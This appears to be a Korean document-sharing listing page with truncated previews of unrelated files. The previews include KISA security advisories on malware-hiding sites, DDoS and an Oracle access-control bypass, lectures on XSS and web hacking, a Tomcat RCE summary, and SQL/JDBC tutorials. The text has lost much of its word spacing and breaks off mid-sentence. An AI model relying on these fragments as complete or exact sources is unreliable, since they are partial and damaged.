More information< 목차 > 1. 악성코드은닉동향요약 1 2. 홈페이지은닉형악성코드통계 2 - 유포지탐지 국가별현황 2 - 대량경유지가탐지된유포지 TOP 악성코드유형별비율 4 - 악성코드취약점유형별비율 4 - 악성코드수집및분석결과 5 - 경유지탐지 업종별비율 9 3. 악성코
월간악성코드은닉사이트탐지 동향보고서 (2 월 ) 2013. 03. 침해사고대응단 인터넷침해대응센터 < 목차 > 1. 악성코드은닉동향요약 1 2. 홈페이지은닉형악성코드통계 2 - 유포지탐지 국가별현황 2 - 대량경유지가탐지된유포지 TOP10 3 - 악성코드유형별비율 4 - 악성코드취약점유형별비율 4 - 악성코드수집및분석결과 5 - 경유지탐지 업종별비율 9 3.
More informationObservational Determinism for Concurrent Program Security
웹응용프로그램보안취약성 분석기구현 소프트웨어무결점센터 Workshop 2010. 8. 25 한국항공대학교, 안준선 1 소개 관련연구 Outline Input Validation Vulnerability 연구내용 Abstract Domain for Input Validation Implementation of Vulnerability Analyzer 기존연구
More information(Microsoft PowerPoint - NRMWFKPIIYBC [\310\243\310\257 \270\360\265\345])
Contents I. 최신보안사고사례 II. III. IV. 자동화된패키지공격유형 분산서비스거부공격 사회공학적기법과기술적공격유형 V. 대응방안 2 들어가기전 웹해킹? 웹서버에서실행중인어플리케이션의취약점을공격하는해킹의일종 WEB + HACKING = WEB HACKING - 80 포트, 443 포트, 8080 포트등웹서비스를지원하는포트를이용한공격 Operation
More informationMicrosoft PowerPoint - 10Àå.ppt
10 장. DB 서버구축및운영 DBMS 의개념과용어를익힌다. 간단한 SQL 문법을학습한다. MySQL 서버를설치 / 운영한다. 관련용어 데이터 : 자료 테이블 : 데이터를표형식으로표현 레코드 : 테이블의행 필드또는컬럼 : 테이블의열 필드명 : 각필드의이름 데이터타입 : 각필드에입력할값의형식 학번이름주소연락처 관련용어 DB : 테이블의집합 DBMS : DB 들을관리하는소프트웨어
More information90
89 3 차원공간질의를위한효율적인위상학적데이터모델의검증 Validation of Efficient Topological Data Model for 3D Spatial Queries Seokho Lee Jiyeong Lee 요약 키워드 Abstract Keywords 90 91 92 93 94 95 96 -- 3D Brep adjacency_ordering DECLARE
More informationuntitled
Oracle DBMS 로그인의접근제어우회 취약점분석 2006. 2. 9 인터넷침해사고대응지원센터 (KISC) 본보고서의전부나일부를인용시반드시 [ 자료 : 한국정보보호진흥원 (KISA)] 룰명시하여주시기바랍니다. 개요 o 2005년이후 Oracle Critical Patch Update(CPU) 는 Oracle사제품대상으로다수의보안패치및보안패치와관련된일반패치를발표하는주요수단임
More informationBind Peeking 한계에따른 Adaptive Cursor Sharing 등장 엑셈컨설팅본부 /DB 컨설팅팀김철환 Bind Peeking 의한계 SQL 이최초실행되면 3 단계의과정을거치게되는데 Parsing 단계를거쳐 Execute 하고 Fetch 의과정을통해데이터
Bind Peeking 한계에따른 Adaptive Cursor Sharing 등장 엑셈컨설팅본부 /DB 컨설팅팀김철환 Bind Peeking 의한계 SQL 이최초실행되면 3 단계의과정을거치게되는데 Parsing 단계를거쳐 Execute 하고 Fetch 의과정을통해데이터를사용자에게전송하게되며 Parsing 단계에서실행계획이생성된다. Bind 변수를사용하는 SQL
More information<BBE7B0EDB3EBC6AE5FC7E3BAEAB0D4C0D32E687770>
웹하드서비스를통해생성된 Botnet 을이용한 DDoS 공격피해사례 2009. 12. 본보고서의전부나일부를인용시반드시 [ 자료 : 한국인터넷침해대응센터 (KrCERT)] 를명시하여주시기바랍니다. - 1 - 1. 개요 최근발생하고있는 DDoS 사례들을분석해보면그방식들이점점지능화되고조직화되고있다는것을확인할수있다. 또한 DDoS 공격의목적도과거자기과시또는정치적인이유의단순한목적에서벗어나금전적이득을취하거나경쟁업체의영업을방해하기위한목적으로점차기업화되고있기도하다.
More informationSQL Developer Connect to TimesTen 유니원아이앤씨 DB 기술지원팀 2010 년 07 월 28 일 문서정보 프로젝트명 SQL Developer Connect to TimesTen 서브시스템명 버전 1.0 문서명 작성일 작성자
SQL Developer Connect to TimesTen 유니원아이앤씨 DB 팀 2010 년 07 월 28 일 문서정보 프로젝트명 SQL Developer Connect to TimesTen 서브시스템명 버전 1.0 문서명 작성일 2010-07-28 작성자 김학준 최종수정일 2010-07-28 문서번호 20100728_01_khj 재개정이력 일자내용수정인버전
More information강의 개요
DDL TABLE 을만들자 웹데이터베이스 TABLE 자료가저장되는공간 문자자료의경우 DB 생성시지정한 Character Set 대로저장 Table 생성시 Table 의구조를결정짓는열속성지정 열 (Clumn, Attribute) 은이름과자료형을갖는다. 자료형 : http://dev.mysql.cm/dc/refman/5.1/en/data-types.html TABLE
More informationWindows 8에서 BioStar 1 설치하기
/ 콘텐츠 테이블... PC에 BioStar 1 설치 방법... Microsoft SQL Server 2012 Express 설치하기... Running SQL 2012 Express Studio... DBSetup.exe 설정하기... BioStar 서버와 클라이언트 시작하기... 1 1 2 2 6 7 1/11 BioStar 1, Windows 8 BioStar
More information<3035303432365FC8A8C6E4C0CCC1F620B0B3B9DF20BAB8BEC8B0A1C0CCB5E5C3D6C1BE28C0FAC0DBB1C7BBE8C1A6292E687770>
개 요 홈페이지 해킹 현황 및 사례 홈페이지 개발시 보안 취약점 및 대책 주요 애플리케이션 보안 대책 결 론 참고자료 [부록1] 개발 언어별 로그인 인증 프로세스 예제 [부록2] 대규모 홈페이지 변조 예방을 위한 권고(안) [부록3] 개인정보의 기술적 관리적 보호조치 기준(안) [부록4] 웹 보안관련 주요 사이트 리스트 7000 6,478 6000 5000
More informationXSS Attack - Real-World XSS Attacks, Chaining XSS and Other Attacks, Payloads for XSS Attacks
XSS s XSS, s, May 25, 2010 XSS s 1 2 s 3 XSS s MySpace 사건. Samy (JS.Spacehero) 프로필 페이지에 자바스크립트 삽입. 스크립트 동작방식 방문자를 친구로 추가. 방문자의 프로필에 자바스크립트를 복사. 1시간 만에 백만 명이 친구등록. s XSS s 위험도가 낮은 xss 취약점을 다른 취약점과 연계하여
More informationResearch & Technique Apache Tomcat RCE 취약점 (CVE ) 취약점개요 지난 4월 15일전세계적으로가장많이사용되는웹애플리케이션서버인 Apache Tomcat에서 RCE 취약점이공개되었다. CVE 취약점은 W
Research & Technique Apache Tomcat RCE 취약점 (CVE-2019-0232) 취약점개요 지난 4월 15일전세계적으로가장많이사용되는웹애플리케이션서버인 Apache Tomcat에서 RCE 취약점이공개되었다. CVE-2019-0232 취약점은 Windows 시스템의 Apache Tomcat 서버에서 enablecmdlinearguments
More informationMicrosoft Word - src.doc
IPTV 서비스탐색및콘텐츠가이드 RI 시스템운용매뉴얼 목차 1. 서버설정방법... 5 1.1. 서비스탐색서버설정... 5 1.2. 컨텐츠가이드서버설정... 6 2. 서버운용방법... 7 2.1. 서비스탐색서버운용... 7 2.1.1. 서비스가이드서버실행... 7 2.1.2. 서비스가이드정보확인... 8 2.1.3. 서비스가이드정보추가... 9 2.1.4. 서비스가이드정보삭제...
More informationMicrosoft PowerPoint - Java7.pptx
HPC & OT Lab. 1 HPC & OT Lab. 2 실습 7 주차 Jin-Ho, Jang M.S. Hanyang Univ. HPC&OT Lab. jinhoyo@nate.com HPC & OT Lab. 3 Component Structure 객체 (object) 생성개념을이해한다. 외부클래스에대한접근방법을이해한다. 접근제어자 (public & private)
More information** 5 개이발생한주요소프트웨어별취약점세 EDB 번호취약점종류공격난이도공격위험도취약점이름소프트웨어이름
EDB 분석보고서 (016.01) 016.01.01~016.01.31 Exploit-DB(http://exploit-db.com) 에공개된취약점별로분류한정보입니다. 분석내용정리 ( 작성 : 펜타시큐리티시스템보안성평가팀 ) 016 년 1 월에공개된 Exploit-DB 의분석결과, SQL Injection 공격에대한취약점보고개수가가장많았습니다. 분석된 SQL Injection
More informationAhnLab_template
해킹과침해대응 웹해킹과대응 2013. 10. 17 ( 목 ) 안랩 ASEC 대응팀문영조 Contents 01 웹해킹과취약점 02 웹해킹기법에대한이해 03 웹해킹과침해대응 04 결론 01 웹해킹과취약점 개요 01. 웹해킹과취약점 < 출처 - IBM X-Force 2012 Annual Trend & Risk Report> 4 개요 01. 웹해킹과취약점 웹해킹 (Web
More informationSecure Programming Lecture1 : Introduction
Malware and Vulnerability Analysis Lecture4-1 Vulnerability Analysis #4-1 Agenda 웹취약점점검 웹사이트취약점점검 HTTP and Web Vulnerability HTTP Protocol 웹브라우저와웹서버사이에하이퍼텍스트 (Hyper Text) 문서송수신하는데사용하는프로토콜 Default Port
More information학습목표 함수프로시저, 서브프로시저의의미를안다. 매개변수전달방식을학습한다. 함수를이용한프로그래밍한다. 2
학습목표 함수프로시저, 서브프로시저의의미를안다. 매개변수전달방식을학습한다. 함수를이용한프로그래밍한다. 2 6.1 함수프로시저 6.2 서브프로시저 6.3 매개변수의전달방식 6.4 함수를이용한프로그래밍 3 프로시저 (Procedure) 프로시저 (Procedure) 란무엇인가? 논리적으로묶여있는하나의처리단위 내장프로시저 이벤트프로시저, 속성프로시저, 메서드, 비주얼베이직내장함수등
More information13주-14주proc.PDF
12 : Pro*C/C++ 1 2 Embeded SQL 3 PRO *C 31 C/C++ PRO *C NOT! NOT AND && AND OR OR EQUAL == = SQL,,, Embeded SQL SQL 32 Pro*C C SQL Pro*C C, C Pro*C, C C 321, C char : char[n] : n int, short, long : float
More information목차 BUG 문법에맞지않는질의문수행시, 에러메시지에질의문의일부만보여주는문제를수정합니다... 3 BUG ROUND, TRUNC 함수에서 DATE 포맷 IW 를추가지원합니다... 5 BUG ROLLUP/CUBE 절을포함하는질의는 SUBQUE
ALTIBASE HDB 6.3.1.10.1 Patch Notes 목차 BUG-45710 문법에맞지않는질의문수행시, 에러메시지에질의문의일부만보여주는문제를수정합니다... 3 BUG-45730 ROUND, TRUNC 함수에서 DATE 포맷 IW 를추가지원합니다... 5 BUG-45760 ROLLUP/CUBE 절을포함하는질의는 SUBQUERY REMOVAL 변환을수행하지않도록수정합니다....
More information10.ppt
: SQL. SQL Plus. JDBC. SQL >> SQL create table : CREATE TABLE ( ( ), ( ),.. ) SQL >> SQL create table : id username dept birth email id username dept birth email CREATE TABLE member ( id NUMBER NOT NULL
More informationSKINFOSEC_TECH_005_China Bot_가칭_ 악성코드 분석_v0.3.doc
SKInfosec-Tech-005 China Bot( 가칭 ) 악성코드분석 한상흠, 황교국 (m4gichack@gmail.com, fullc0de@gmail.com) SK Infosec Co., Inc MSS 사업본부침해대응팀 Table of Contents 1. 개요...3 2. MSSQL2005 취약점...4 3. 악성코드분석...7 3.1. 0.js...8
More information제목 레이아웃
웹해킹이라고무시하는것들보소 2017.07.10 RUBIYA805[AT]GMAIL[DOT]COM SQL Injection 끝나지않은위협 2017.07.10 RUBIYA805[AT]GMAIL[DOT]COM Who am I 정도원 aka rubiya Penetration tester Web application bughuter Pwned 20+ wargame @kr_rubiya
More informationPowerPoint 프레젠테이션
MySQL - 명령어 1. 데이터베이스관련명령 2. 데이터베이스테이블관련명령 3. SQL 명령의일괄실행 4. 레코드관련명령 5. 데이터베이스백업및복원명령 1. 데이터베이스관련명령 데이터베이스접속명령 데이터베이스접속명령 mysql -u계정 -p비밀번호데이터베이스명 C: > mysql -ukdhong p1234 kdhong_db 데이터베이스생성명령 데이터베이스생성명령
More informationSpring Boot/JDBC JdbcTemplate/CRUD 예제
Spring Boot/JDBC JdbcTemplate/CRUD 예제 오라클자바커뮤니티 (ojc.asia, ojcedu.com) Spring Boot, Gradle 과오픈소스인 MariaDB 를이용해서 EMP 테이블을만들고 JdbcTemplate, SimpleJdbcTemplate 을이용하여 CRUD 기능을구현해보자. 마리아 DB 설치는다음 URL 에서확인하자.
More informationPowerPoint Presentation
객체지향프로그래밍 클래스, 객체, 메소드 ( 실습 ) 손시운 ssw5176@kangwon.ac.kr 예제 1. 필드만있는클래스 텔레비젼 2 예제 1. 필드만있는클래스 3 예제 2. 여러개의객체생성하기 4 5 예제 3. 메소드가추가된클래스 public class Television { int channel; // 채널번호 int volume; // 볼륨 boolean
More informationMicrosoft Word - [Unioneinc] 특정컬럼의 통계정보 갱신_ _ldh.doc
특정 Column 통계정보갱신가이드 유니원아이앤씨 DB 사업부이대혁 2015 년 03 월 02 일 문서정보프로젝트명서브시스템명 버전 1.0 문서명 특정 Column 통계정보갱신가이드 작성일 2015-03-02 작성자 DB사업부이대혁사원 최종수정일 2015-03-02 문서번호 UNIONE-201503021500-LDH 재개정이력 일자내용수정인버전 문서배포이력
More informationI II III IV 웹방화벽의필요성 WAPPLES 위치 인증및수상현황 2
지능형웹어플리케이션방화벽 2013 년 12 월펜타시큐리티시스템 I II III IV 웹방화벽의필요성 WAPPLES 위치 인증및수상현황 2 I 웹방화벽의필요성 Internet 에접속되어있다는것 = 언제든 Hacker 의공격을받을수있다는것 Gartner 보고서에서도언급된바있듯이, Web 공격의 75% 가웹어플리케이션층을타겟으로발생하고있다. 3 I 웹방화벽의필요성
More information쉽게 풀어쓴 C 프로그래밊
Power Java 제 27 장데이터베이스 프로그래밍 이번장에서학습할내용 자바와데이터베이스 데이터베이스의기초 SQL JDBC 를이용한프로그래밍 변경가능한결과집합 자바를통하여데이터베이스를사용하는방법을학습합니다. 자바와데이터베이스 JDBC(Java Database Connectivity) 는자바 API 의하나로서데이터베이스에연결하여서데이터베이스안의데이터에대하여검색하고데이터를변경할수있게한다.
More informationMicrosoft PowerPoint - 3장-MS SQL Server.ppt [호환 모드]
MS SQL Server 마이크로소프트사가윈도우운영체제를기반으로개발한관계 DBMS 모바일장치에서엔터프라이즈데이터시스템에이르는다양한플랫폼에서운영되는통합데이터관리및분석솔루션 2 MS SQL Server 개요 3.1 MS SQL Server 개요 클라이언트-서버모델을기반으로하는관계 DBMS로서윈도우계열의운영체제에서만동작함 오라클관계 DBMS보다가격이매우저렴한편이고,
More information#WI DNS DDoS 공격악성코드분석
#WI-13-025 2013-07-19 내용요약 이보고서는 7 월 15 일 Fortinet 의 Kyle Yang 이작성한 6.25 DNS DDoS Attack In Korea 를참고하여작성된것임 공격대상이된 DNS 서버는 ns.gcc.go.kr 과 ns2.gcc.go.kr 로, 악성코드에 감염된좀비 PC 는 DNS 서버에대한도메인확인질의에대한응답을두 타깃으로보내지도록하는방법을이용하였음
More information< F33BFF920C0CEC5CDB3DD20C4A7C7D8BBE7B0ED20B5BFC7E220B9D720BAD0BCAEBFF9BAB828C3D6C1BEBABB292E687770>
악성코드유포지 경유지의공격코드와보안취약점 1. 개요 본고에서는인터넷침해사고대응지원센터에서자체개발 적용하고있는악성코드은닉사이트탐지프로그램에서 2006년 1월부터 3월까지탐지한사이트중 50개를대상으로공격코드및관련소프트웨어취약점을분석한다. 먼저 ( 그림 1) 에서악성코드유포와경유지를구분하고, 2005년이후게재되었던 인터넷침해사고동향및분석월보 관련기사를해당부분에적어보았다.
More informationWINDOW FUNCTION 의이해와활용방법 엑셈컨설팅본부 / DB 컨설팅팀정동기 개요 Window Function 이란행과행간의관계를쉽게정의할수있도록만든함수이다. 윈도우함수를활용하면복잡한 SQL 들을하나의 SQL 문장으로변경할수있으며반복적으로 ACCESS 하는비효율역
WINDOW FUNCTION 의이해와활용방법 엑셈컨설팅본부 / DB 컨설팅팀정동기 개요 Window Function 이란행과행간의관계를쉽게정의할수있도록만든함수이다. 윈도우함수를활용하면복잡한 SQL 들을하나의 SQL 문장으로변경할수있으며반복적으로 ACCESS 하는비효율역시쉽게해결할수있다. 이번화이트페이퍼에서는 Window Function 중순위 RANK, ROW_NUMBER,
More information암호내지2010.1.8
Contents 분류 안내서 해설서 해당팀명 발간년월 대상 수준 인터넷 진흥 인터넷 이용 활성화 정보보호 시스템 관리 한국인터넷진흥원(KISA) 안내서 해설서 시리즈 DNS 설정 안내서 시스템관리팀
More informationC# Programming Guide - Types
C# Programming Guide - Types 최도경 lifeisforu@wemade.com 이문서는 MSDN 의 Types 를요약하고보충한것입니다. http://msdn.microsoft.com/enus/library/ms173104(v=vs.100).aspx Types, Variables, and Values C# 은 type 에민감한언어이다. 모든
More information취약점분석보고서 Simple Web Server 2.2 rc2 Remote Buffer Overflow Exploit RedAlert Team 안상환
취약점분석보고서 Simple Web Server 2.2 rc2 Remote Buffer Overflow Exploit 2012-07-19 RedAlert Team 안상환 목 차 1. 개요... 1 1.1. 취약점분석추진배경... 1 2. Simple Web Server 취약점... 2 2.1. Simple Web Server 취약점개요... 2 2.2. Simple
More informationMicrosoft Word - Blind Sql Injection.doc
Blind Sql Injection MySQL 5.0 본문서는배포는누구나마음대로수정및배포하실수있습니다. 테스트환경 : MySQL 5.3, PHP 5.2 - 방립동 - 개요. MySQL 이 3.0 버전에서 4.0 버전으로업그레이되되면서 UNION 절을사용할수있게되었습니다. 따라서 UNION을이용한공격방법이소개되었죠. 또한블라인드인젝션기법을이용한공격방법이문서나,
More information< 목차 > Ⅰ. 개요 3 Ⅱ. 실시간스팸차단리스트 (RBL) ( 간편설정 ) 4 1. 메일서버 (Exchange Server 2007) 설정변경 4 2. 스팸차단테스트 10
(https://www.kisarbl.or.kr) < 목차 > Ⅰ. 개요 3 Ⅱ. 실시간스팸차단리스트 (RBL) ( 간편설정 ) 4 1. 메일서버 (Exchange Server 2007) 설정변경 4 2. 스팸차단테스트 10 Ⅰ. 개요 실시간스팸차단리스트 (RBL) 는메일서버를운영하는누구나손쉽게효과적으로스팸수신을차단하는데이용할수있도록한국인터넷진흥원 (KISA)
More information슬라이드 1
Pairwise Tool & Pairwise Test NuSRS 200511305 김성규 200511306 김성훈 200614164 김효석 200611124 유성배 200518036 곡진화 2 PICT Pairwise Tool - PICT Microsoft 의 Command-line 기반의 Free Software www.pairwise.org 에서다운로드후설치
More information??
한국공항공사와 어린이재단이 함께하는 제2회 다문화가정 생활수기 공모전 수기집 대한민국 다문화가정의 행복과 사랑을 함께 만들어 갑니다. Contents 02 04 06 07 08 10 14 16 20 22 25 28 29 30 31 4 5 6 7 8 9 10 11 12 13 15 14 17 16 19 18 21 20 23 22 24 25 26 27 29 28
More information이용자를 위하여 1. 본 보고서의 각종 지표는 강원도, 정부 각부처, 기타 국내 주요 기관에서 생산 한 통계를 이용하여 작성한 것으로서 각 통계표마다 그 출처를 주기하였음. 2. 일부 자료수치는 세목과 합계가 각각 반올림되었으므로 세목의 합이 합계와 일 치되지 않는 경우도 있음. 3. 통계표 및 도표의 내용 중에서 전년도판 수치와 일치되지 않는 것은 최근판에서
More information목차 BUG DEQUEUE 의 WAIT TIME 이 1 초미만인경우, 설정한시간만큼대기하지않는문제가있습니다... 3 BUG [qp-select-pvo] group by 표현식에있는컬럼을참조하는집합연산이존재하지않으면결괏값오류가발생할수있습니다... 4
ALTIBASE HDB 6.5.1.5.10 Patch Notes 목차 BUG-46183 DEQUEUE 의 WAIT TIME 이 1 초미만인경우, 설정한시간만큼대기하지않는문제가있습니다... 3 BUG-46249 [qp-select-pvo] group by 표현식에있는컬럼을참조하는집합연산이존재하지않으면결괏값오류가발생할수있습니다... 4 BUG-46266 [sm]
More informationMicrosoft PowerPoint - 3ÀÏ°_º¯¼ö¿Í »ó¼ö.ppt
변수와상수 1 변수란무엇인가? 변수 : 정보 (data) 를저장하는컴퓨터내의특정위치 ( 임시저장공간 ) 메모리, register 메모리주소 101 번지 102 번지 변수의크기에따라 주로 byte 단위 메모리 2 기본적인변수형및변수의크기 변수의크기 해당컴퓨터에서는항상일정 컴퓨터마다다를수있음 short
More information*2008년1월호진짜
3. USB 이동식저장장치를이용하여전파되는악성코드분석 1. 개 요 최근 USB 이동식 저장장치를 통하여 전파되는 악성코드에 대한 감염피해가 증가하고 있어 주의가 필요하다. 이번에 확인된 ntion.exe 악성코드는 감염 시, 특정 사이트에 접속하여 추가 악성코드를 다운로드하는 Dropper 기능을 수행한다. 또한, 웹 서버가 감염될 경우는 웹 서버내의 웹 페이지가
More informationALTIBASE HDB Patch Notes
ALTIBASE HDB 6.5.1.5.6 Patch Notes 목차 BUG-45643 암호화컬럼의경우, 이중화환경에서 DDL 수행시 Replication HandShake 가실패하는문제가있어수정하였습니다... 4 BUG-45652 이중화에서 Active Server 와 Standby Server 의 List Partition 테이블의범위조건이다른경우에 Handshake
More information배치프로그램에서튜닝대상 SQL 추출하기 엑셈컨설팅본부 /DB 컨설팅팀박성호 배치프로그램의성능문제를진단하기위해트레이스를사용할수없고, 개별 SQL 에대한성 능점검은비효율적인경우에어떻게배치프로그램의성능문제를제대로파악하고개선안을도 출할것인가? 복잡한로직을가지고있는프로그램 (
배치프로그램에서튜닝대상 SQL 추출하기 엑셈컨설팅본부 /DB 컨설팅팀박성호 배치프로그램의성능문제를진단하기위해트레이스를사용할수없고, 개별 SQL 에대한성 능점검은비효율적인경우에어떻게배치프로그램의성능문제를제대로파악하고개선안을도 출할것인가? 복잡한로직을가지고있는프로그램 ( 이후배치프로그램 ) 에대한성능문제를파악하기위해수행되는모든 SQL 에대한개별수행내역을정확히판단할수있어야한다.
More information기술문서 작성 XXE Attacks 작성자 : 인천대학교 OneScore 김영성 I. 소개 2 II. 본문 2 가. XML external entities 2 나. XXE Attack 3 다. 점검방법 3 라.
기술문서 14. 11. 10. 작성 XXE Attacks 작성자 : 인천대학교 OneScore 김영성 dokymania@naver.com I. 소개 2 II. 본문 2 가. XML external entities 2 나. XXE Attack 3 다. 점검방법 3 라. Exploit 5 마. 피해 6 III. 결론 6 가. 권고사항 6 I. 소개 가. 역자 본문서는
More informationDBMS & SQL Server Installation Database Laboratory
DBMS & 조교 _ 최윤영 } 데이터베이스연구실 (1314 호 ) } 문의사항은 cyy@hallym.ac.kr } 과제제출은 dbcyy1@gmail.com } 수업공지사항및자료는모두홈페이지에서확인 } dblab.hallym.ac.kr } 홈페이지 ID: 학번 } 홈페이지 PW:s123 2 차례 } } 설치전점검사항 } 설치단계별설명 3 Hallym Univ.
More informationInsertColumnNonNullableError(#colName) 에해당하는메시지출력 존재하지않는컬럼에값을삽입하려고할경우, InsertColumnExistenceError(#colName) 에해당하는메시지출력 실행결과가 primary key 제약에위배된다면, Ins
Project 1-3: Implementing DML Due: 2015/11/11 (Wed), 11:59 PM 이번프로젝트의목표는프로젝트 1-1 및프로젝트 1-2에서구현한프로그램에기능을추가하여간단한 DML을처리할수있도록하는것이다. 구현한프로그램은 3개의 DML 구문 (insert, delete, select) 을처리할수있어야한다. 테이블데이터는파일에저장되어프로그램이종료되어도사라지지않아야한다.
More informationDocsPin_Korean.pages
Unity Localize Script Service, Page 1 Unity Localize Script Service Introduction Application Game. Unity. Google Drive Unity.. Application Game. -? ( ) -? -?.. 준비사항 Google Drive. Google Drive.,.. - Google
More information5장. JSP와 Servlet 프로그래밍을 위한 기본 문법(완성-0421).hwp
1 0 1.7 6 5 'A ' '/ u 4 4 2 2 ' " JS P 프로그래밍 " A ', 'b ', ' 한 ', 9, \ u d 6 5 4 ' c h a r a = 'A '; 0 1 0 2 0 3 0 4 0 5 0 6 0 7 0 8 0 9 1 0 1 1 1 2 1 3 1 4 1 5 1 6 1 7 1 8 1 9 < % @ p a g e c o n te n
More information윈도우즈프로그래밍(1)
제어문 (2) For~Next 문 윈도우즈프로그래밍 (1) ( 신흥대학교컴퓨터정보계열 ) 2/17 Contents 학습목표 프로그램에서주어진특정문장을부분을일정횟수만큼반복해서실행하는문장으로 For~Next 문등의구조를이해하고활용할수있다. 내용 For~Next 문 다중 For 문 3/17 제어문 - FOR 문 반복문 : 프로그램에서주어진특정문장들을일정한횟수만큼반복해서실행하는문장
More information<3035313230325FBBE7B0EDB3EBC6AE5FB5F0C6FAC6AEC6D0BDBABFF6B5E5C3EBBEE0C1A128BCF6C1A4292E687770>
네트워크 장비의 디폴트 로그인 패스워드 취약점 및 대책 2005. 11. 30 본 보고서의 전부나 일부를 인용시 반드시 [자료: 한국정보보호진흥원(KISA)]룰 명시하여 주시기 바랍니다. - 1 - 1. 개요 패스워드 관리는 보안의 가장 기본적인 사항으로 유추하기 어려운 패스워드를 사용하고, 주기적 으로 패스워드를 변경하는 등 패스워드 관리에 신경을 많이 쓰고
More informationsms_SQL.hwp
SMS+LMS 사용설명서 MSSQL + MYSQL (Table 연동방식) Insert 문장만으로귀사의전산시스템과연동하여 대량의문자메시지(SMS) 를저렴하고, 빠르고자동으로발송할수있는 문자메시지전송시스템을개발할수있습니다. 실행파일(exe) 파일을에디터로열어보시고 아이디, 비밀번호가노출되지않는지꼭확인해보시기바랍니다 2008. 11. 1. 발송 Table Table
More information<C6F7C6AEB6F5B1B3C0E72E687770>
1-1. 포트란 언어의 역사 1 1-2. 포트란 언어의 실행 단계 1 1-3. 문제해결의 순서 2 1-4. Overview of Fortran 2 1-5. Use of Columns in Fortran 3 1-6. INTEGER, REAL, and CHARACTER Data Types 4 1-7. Arithmetic Expressions 4 1-8. 포트란에서의
More information윈도우시스템프로그래밍
데이터베이스및설계 MySQL 을위한 MFC 를사용한 ODBC 프로그래밍 2012.05.10. 오병우 컴퓨터공학과금오공과대학교 http://www.apmsetup.com 또는 http://www.mysql.com APM Setup 설치발표자료참조 Department of Computer Engineering 2 DB 에속한테이블보기 show tables; 에러발생
More information@OneToOne(cascade = = "addr_id") private Addr addr; public Emp(String ename, Addr addr) { this.ename = ename; this.a
1 대 1 단방향, 주테이블에외래키실습 http://ojcedu.com, http://ojc.asia STS -> Spring Stater Project name : onetoone-1 SQL : JPA, MySQL 선택 http://ojc.asia/bbs/board.php?bo_table=lecspring&wr_id=524 ( 마리아 DB 설치는위 URL
More information강의 개요
정규화와 SELECT (II) 웹데이터베이스 학과 학생 과목 학과 지도교수 학과학번성명 수강과목 담당교수 A 김수정 A 0001 고길동 성질이론 김수정 B 허영만 A 0002 둘리 한식의멋 허영만 C 강풀 B 0003 희동이 심리학의이해 강풀 과목 _ 성적 학번 수강과목 성적 0001 성질이론 A 0001 한식의멋 C 0002 성질이론 A 0002 한식의멋
More informationCloud Friendly System Architecture
-Service Clients Administrator 1. -Service 구성도 : ( 좌측참고 ) LB(LoadBlancer) 2. -Service 개요 ucloud Virtual Router F/W Monitoring 개념 특징 적용가능분야 Server, WAS, DB 로구성되어 web service 를클라우드환경에서제공하기위한 service architecture
More informationJAVA 프로그래밍실습 실습 1) 실습목표 - 메소드개념이해하기 - 매개변수이해하기 - 새메소드만들기 - Math 클래스의기존메소드이용하기 ( ) 문제 - 직사각형모양의땅이있다. 이땅의둘레, 면적과대각
JAVA 프로그래밍실습 실습 1) 실습목표 - 메소드개념이해하기 - 매개변수이해하기 - 새메소드만들기 - Math 클래스의기존메소드이용하기 ( http://java.sun.com/javase/6/docs/api ) 문제 - 직사각형모양의땅이있다. 이땅의둘레, 면적과대각선의길이를계산하는메소드들을작성하라. 직사각형의가로와세로의길이는주어진다. 대각선의길이는 Math클래스의적절한메소드를이용하여구하라.
More informationWebKnight를 활용한 IIS 웹서버 보안
NTFAQ Korea (http://www.ntfaq.co.kr) 이종량 (jrlee@ntfaq.co.kr) 1. WebKnight에대해서 WebKnight의정의 WebKnight의필요성 2. WebKnight의설치 3. 파일의구성 4. WebKnight의설정 5. 필터링 (SQL Injection Keyword) 6. 로그 WebKnight의로그 WebKnight의로그분석
More information설명 Description 상세정보 네이버에서운영하는서비스중하나인쥬니어네이버 ( 이하쥬니버 ) 에서는쥬니버서비스와 관련하여도움을주기위한 [ 그림 1] 과같은플래시애플리케이션이서비스되고있다.[2] [ 그림 1] 쥬니어네이버에서서비스중인쥬니버도우미플래시애플리케이션 해당플래
네이버플래시애플리케이션 XSS 취약점분석보고서 작성일 2013/04/24 작성자 카이스트시스템보안연구실 홍현욱 (karmatia@kaist.ac.kr) 최현우 (zemisolsol@kaist.ac.kr) 김용대 (yongdaek@kaist.ac.kr) 요약 플래시애플리케이션은보고서작성일을기준으로전체웹사이트의 19.5% 가사용하고있으며 [5] 이러한플래시애플리케이션을작동시켜주는플래시플레이어는웹브라우저에기본적으로설치되어있거나웹브라우저에서웹사이트를이용하는사용자들에게자동으로설치하도록유도한다.
More informationJDBC 소개및설치 Database Laboratory
JDBC 소개및설치 JDBC } What is the JDBC? } JAVA Database Connectivity 의약어 } 자바프로그램안에서 SQL 을실행하기위해데이터베이스를연결해주는응용프로그램인터페이스 } 연결된데이터베이스의종류와상관없이동일한방법으로자바가데이터베이스내에서발생하는트랜잭션을제어할수있도록하는환경을제공 2 JDBC Driver Manager }
More informationPoison null byte Excuse the ads! We need some help to keep our site up. List 1 Conditions 2 Exploit plan 2.1 chunksize(p)!= prev_size (next_chunk(p) 3
Poison null byte Excuse the ads! We need some help to keep our site up. List 1 Conditions 2 Exploit plan 2.1 chunksize(p)!= prev_size (next_chunk(p) 3 Example 3.1 Files 3.2 Source code 3.3 Exploit flow
More informationMicrosoft Word - PLSQL.doc
PL/SQL 2008 DB system and programming 보충자료 PL/SQL의실행절 BEGIN 절에서의몇가지규칙 - 실행문은여러라인에걸쳐사용할수있다. - 변수명의명명규칙은오라클의일반적인명명규칙과동일하다. PL/SQL 블록내에서 SQL 문을사용할때에는컬럼명과같은변수명은피해야한다. - SQL에서와마찬가지로날짜와문자는홑따옴표 ( ) 를사용하여인용하여야한다.
More informationWindows Server 2012
Windows Server 2012 Shared Nothing Live Migration Shared Nothing Live Migration 은 SMB Live Migration 방식과다른점은 VM 데이터파일의위치입니다. Shared Nothing Live Migration 방식은 Hyper-V 호스트의로컬디스크에 VM 데이터파일이위치합니다. 반면에, SMB
More informationTTA Journal No.157_서체변경.indd
표준 시험인증 기술 동향 FIDO(Fast IDentity Online) 생체 인증 기술 표준화 동향 이동기 TTA 모바일응용서비스 프로젝트그룹(PG910) 의장 SK텔레콤 NIC 담당 매니저 76 l 2015 01/02 PASSWORDLESS EXPERIENCE (UAF standards) ONLINE AUTH REQUEST LOCAL DEVICE AUTH
